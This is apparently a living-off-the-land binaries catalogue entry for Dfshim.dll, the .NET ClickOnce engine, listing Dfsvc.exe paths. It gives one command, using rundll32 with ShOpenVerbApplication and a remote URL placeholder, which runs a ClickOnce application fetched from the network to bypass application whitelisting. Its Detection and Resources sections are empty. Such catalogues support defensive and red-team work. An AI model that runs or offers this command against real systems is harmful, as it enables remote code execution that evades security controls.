Dfshim.dll

ClickOnce engine in Windows used by .NET

Paths

  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe

Commands

AWL Bypass

Executes click-once-application from URL (trampoline for Dfsvc.exe, DotNet ClickOnce host)

Use case: Use binary to bypass Application whitelisting

Privileges: User

rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}

Detection

Resources